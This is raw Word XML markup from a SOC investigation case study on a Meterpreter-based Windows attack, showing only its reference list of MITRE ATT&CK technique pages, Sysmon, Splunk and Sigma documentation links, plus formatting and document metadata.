    <w:p w14:paraId="5C2AFCAE">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — Create Account: Local Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1136/001/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D320A4">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — Account Manipulation: Additional Local or Domain Groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1098/007/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6401BAF5">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — Scheduled Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1053/005/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22064658">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — Ingress Tool Transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1105/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D261DC9">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK — OS Credential Dumping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://attack.mitre.org/techniques/T1003/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596C14B5">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] Microsoft Sysmon configuration / events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://learn.microsoft.com/en-us/windows/security/operating-system-security/sysmon/sysmon-configuration-files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068CDF0">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] Splunk Universal Forwarder — Windows installation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://help.splunk.com/en/data-management/forward-data/universal-forwarder-manual/9.0/install-the-universal-forwarder/install-a-windows-universal-forwarder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F0EA0">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] SigmaHQ Windows process-creation documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB9C15">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] SigmaHQ — scheduled task examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0663DF">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>[1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>] MITRE ATT&amp;CK Navigator layer format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0B1F33"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>https://github.com/mitre-attack/attack-navigator/blob/master/layers/spec/v4.5/layerformat.md</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="822" w:right="879" w:bottom="765" w:left="87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AdorshoLipi"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="AdorshoLipi">
    <w:panose1 w:val="02000500020000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="80018003"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B02E2">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A7613">
    <w:pPr>
      <w:pStyle w:val="19"/>
    </w:pPr>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="12"/>
      <w:tblW w:w="0" w:type="auto"/>
      <w:jc w:val="center"/>
      <w:tblLayout w:type="autofit"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="5102"/>
      <w:gridCol w:w="5102"/>
    </w:tblGrid>
    <w:tr w14:paraId="1A3F8B1E">
      <w:tblPrEx>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPrEx>
      <w:trPr>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5102" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="1464DC3F">
          <w:pPr>
            <w:jc w:val="left"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
              <w:b/>
              <w:color w:val="64748B"/>
              <w:sz w:val="15"/>
            </w:rPr>
            <w:t>SOC INVESTIGATION CASE STUDY</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5102" w:type="dxa"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="2006A3C8">
          <w:pPr>
            <w:jc w:val="right"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
              <w:b/>
              <w:color w:val="64748B"/>
              <w:sz w:val="15"/>
            </w:rPr>
            <w:t>METASPLOIT • SYSMON • SPLUNK • ATT&amp;CK</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="2ED4C3D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27C6F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C5A27C6F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="800" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="FC4F5416"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FC4F5416"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">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8">
    <w:nsid w:val="695C93F9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="695C93F9"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="610" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>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633B9"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00FC693F"/>
    <w:rsid w:val="01B813C1"/>
    <w:rsid w:val="03D33710"/>
    <w:rsid w:val="044F6D87"/>
    <w:rsid w:val="04B844FD"/>
    <w:rsid w:val="04CD34EE"/>
    <w:rsid w:val="07A27794"/>
    <w:rsid w:val="09D354AA"/>
    <w:rsid w:val="0A183A20"/>
    <w:rsid w:val="0B1178A5"/>
    <w:rsid w:val="0B6751B7"/>
    <w:rsid w:val="0C206374"/>
    <w:rsid w:val="0DD446DD"/>
    <w:rsid w:val="0DE933E1"/>
    <w:rsid w:val="0E572CFE"/>
    <w:rsid w:val="0EDE123B"/>
    <w:rsid w:val="11B87908"/>
    <w:rsid w:val="1279282C"/>
    <w:rsid w:val="135A6356"/>
    <w:rsid w:val="14C227AD"/>
    <w:rsid w:val="15765D8B"/>
    <w:rsid w:val="179F6AD9"/>
    <w:rsid w:val="19B5355B"/>
    <w:rsid w:val="1CD43333"/>
    <w:rsid w:val="1E2458FF"/>
    <w:rsid w:val="1E6A27F1"/>
    <w:rsid w:val="1ED47CA2"/>
    <w:rsid w:val="1EE70EC1"/>
    <w:rsid w:val="1EEB212E"/>
    <w:rsid w:val="1EEE4A8F"/>
    <w:rsid w:val="203853C3"/>
    <w:rsid w:val="218B7488"/>
    <w:rsid w:val="21A76846"/>
    <w:rsid w:val="223C6D39"/>
    <w:rsid w:val="225D6ED9"/>
    <w:rsid w:val="22AD3749"/>
    <w:rsid w:val="22D27296"/>
    <w:rsid w:val="23574F07"/>
    <w:rsid w:val="24EB531E"/>
    <w:rsid w:val="25FE4947"/>
    <w:rsid w:val="26795443"/>
    <w:rsid w:val="26BA63A4"/>
    <w:rsid w:val="2792313A"/>
    <w:rsid w:val="280626E8"/>
    <w:rsid w:val="28B740DA"/>
    <w:rsid w:val="29F8779F"/>
    <w:rsid w:val="2B9E4E55"/>
    <w:rsid w:val="2BE72924"/>
    <w:rsid w:val="2D28671E"/>
    <w:rsid w:val="2E6507D1"/>
    <w:rsid w:val="2EB92AB6"/>
    <w:rsid w:val="2FE30F4E"/>
    <w:rsid w:val="30032E6B"/>
    <w:rsid w:val="30042DBE"/>
    <w:rsid w:val="308F544E"/>
    <w:rsid w:val="309B6BB3"/>
    <w:rsid w:val="30A2385D"/>
    <w:rsid w:val="315D32EF"/>
    <w:rsid w:val="319C7D36"/>
    <w:rsid w:val="331203B8"/>
    <w:rsid w:val="33AE5828"/>
    <w:rsid w:val="33FB76AA"/>
    <w:rsid w:val="34774220"/>
    <w:rsid w:val="34BD176F"/>
    <w:rsid w:val="35F55D16"/>
    <w:rsid w:val="371D349B"/>
    <w:rsid w:val="376E6549"/>
    <w:rsid w:val="392748D4"/>
    <w:rsid w:val="39F0651B"/>
    <w:rsid w:val="3B9D2EA2"/>
    <w:rsid w:val="3BAC4273"/>
    <w:rsid w:val="3D534A7A"/>
    <w:rsid w:val="3E9B0C43"/>
    <w:rsid w:val="3FC91B34"/>
    <w:rsid w:val="407E705F"/>
    <w:rsid w:val="42856A5F"/>
    <w:rsid w:val="42B34A7B"/>
    <w:rsid w:val="43E04E60"/>
    <w:rsid w:val="43FA44C2"/>
    <w:rsid w:val="44883346"/>
    <w:rsid w:val="4735425F"/>
    <w:rsid w:val="48F32F3B"/>
    <w:rsid w:val="490A36DF"/>
    <w:rsid w:val="490B3AF4"/>
    <w:rsid w:val="49CA5B11"/>
    <w:rsid w:val="4BF110E3"/>
    <w:rsid w:val="4DC60ADA"/>
    <w:rsid w:val="4E491FD6"/>
    <w:rsid w:val="4EB865B3"/>
    <w:rsid w:val="4FA74FBE"/>
    <w:rsid w:val="4FB7092D"/>
    <w:rsid w:val="51070764"/>
    <w:rsid w:val="52140592"/>
    <w:rsid w:val="53664E9E"/>
    <w:rsid w:val="54A26E92"/>
    <w:rsid w:val="55D20BA0"/>
    <w:rsid w:val="580852C3"/>
    <w:rsid w:val="58776FB0"/>
    <w:rsid w:val="5A2E6DC3"/>
    <w:rsid w:val="5A527BA4"/>
    <w:rsid w:val="5AE34EAB"/>
    <w:rsid w:val="5B96060B"/>
    <w:rsid w:val="5C2C7702"/>
    <w:rsid w:val="5D2D376B"/>
    <w:rsid w:val="5DC97381"/>
    <w:rsid w:val="5DDB5772"/>
    <w:rsid w:val="61965ED0"/>
    <w:rsid w:val="62161E34"/>
    <w:rsid w:val="62D83CB7"/>
    <w:rsid w:val="678107CF"/>
    <w:rsid w:val="6A097E59"/>
    <w:rsid w:val="6A924C17"/>
    <w:rsid w:val="6BA505A7"/>
    <w:rsid w:val="6D8123DD"/>
    <w:rsid w:val="6F47651F"/>
    <w:rsid w:val="6F717E51"/>
    <w:rsid w:val="708A7E30"/>
    <w:rsid w:val="714526BB"/>
    <w:rsid w:val="71503616"/>
    <w:rsid w:val="73604D41"/>
    <w:rsid w:val="765637C0"/>
    <w:rsid w:val="77E27577"/>
    <w:rsid w:val="7959220C"/>
    <w:rsid w:val="79C627D6"/>
    <w:rsid w:val="7A474029"/>
    <w:rsid w:val="7B7B6DDE"/>
    <w:rsid w:val="7BBE6194"/>
    <w:rsid w:val="7C5C018E"/>
    <w:rsid w:val="7C722125"/>
    <w:rsid w:val="7D0B3E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1F2937"/>
      <w:sz w:val="19"/>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0B1F33"/>
      <w:sz w:val="36"/>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0B1F33"/>
      <w:sz w:val="27"/>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0B1F33"/>
      <w:sz w:val="22"/>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1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>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B1F33"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="52"/>
    </w:r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Code Block"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="E2E8F0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="169">
    <w:name w:val="Small Note"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:i/>
      <w:color w:val="4B5563"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="170">
    <w:name w:val="Small"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="334155"/>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7612</Words>
  <Characters>52483</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>59419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Sourov</dc:creator>
  <dc:description>generated by python-docx</dc:description>
  <cp:keywords>SOC, Sysmon, Splunk, MITRE ATT&amp;CK, Sigma, Meterpreter, Windows 10, DFIR</cp:keywords>
  <cp:lastModifiedBy>Saad Ahsan</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-02T20:40:39Z</dcterms:modified>
  <dc:subject>SOC / DFIR controlled lab case study</dc:subject>
  <dc:title>From Phishing to Meterpreter C2: A Windows Attack Investigation Using Sysmon, Splunk and MITRE ATT&amp;CK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eyJoZGlkIjoiNGFhOTA5MTY4MzA4MWUyOGYzZjM5MzE3M2IyZmM1ZDYiLCJ1c2VySWQiOiIzMTYxMDk3OTc3MTAyIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.28485</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>67AD71C83B0F4DAE95C021EE098CDB90_13</vt:lpwstr>
  </property>
</Properties>
</file>